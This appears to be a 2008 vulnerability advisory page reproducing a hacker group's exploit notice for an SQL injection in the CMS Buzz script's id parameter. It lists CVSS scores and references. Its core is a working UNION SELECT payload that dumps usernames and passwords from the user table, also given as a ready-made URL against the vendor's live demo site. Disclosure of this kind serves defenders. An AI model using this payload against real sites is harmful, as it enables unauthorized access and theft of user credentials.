CMS Buzz (id) Remote SQL Injection Vulnerability

2008.10.02
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

################################################################################################# #################################### proud to be muslim ###################################### ### ### ### rEm0te sql injction VulnErability ### ### ### ### (cmsbuzz script) ### ### ### ################################################################################################# ################################################################################################# ### ### ### AuTh0r : security fears team ### ### ### ### Home : WwW.alsonaa.com ### ### ### ### members: HeB4RieH , germaya_x ### ### ### ################################################################################################# ################################################################################################# ### ### ### Script Name : cmsbuzz ### ### ### ### download : http://cmsbuzz.com/purchase.php ### ### ### ### Email : s-fteam@securityfears.cc ### ################################################################################################# ################################################################################################# ### ### ### d0rk :: "use your mind" ### ### ### ### ### ### -(:: sql Code ::)- ### ### ?action=playgame&id=(sql) ### ###(sql)=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- ### ### ################################################################################################# ### ### ### -(:: l!ve demo ::)- ### ### ### ###http://demo.cmsbuzz.com/?action=playgame&id=-6+union+select+1,2,3,concat_ws(0x3a3a,username,upasswd),5,6,7,8,9,10,11,12,13+from+tbl_userprofile-- ### ### ### ### ######################## ##################### ######################## ##################### ################################################################################################# ################################################################################################# -(:: !GreTzZ! ::)- ::SnIpEr.KiLLeR::fa6al error::black cheetah::X_HaCker::str0ke::MusliMs HaCkErs:: ################################################################################################# #################################################################################################

References:

http://www.securityfocus.com/bid/31097
http://www.milw0rm.com/exploits/6408
http://secunia.com/advisories/31817


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top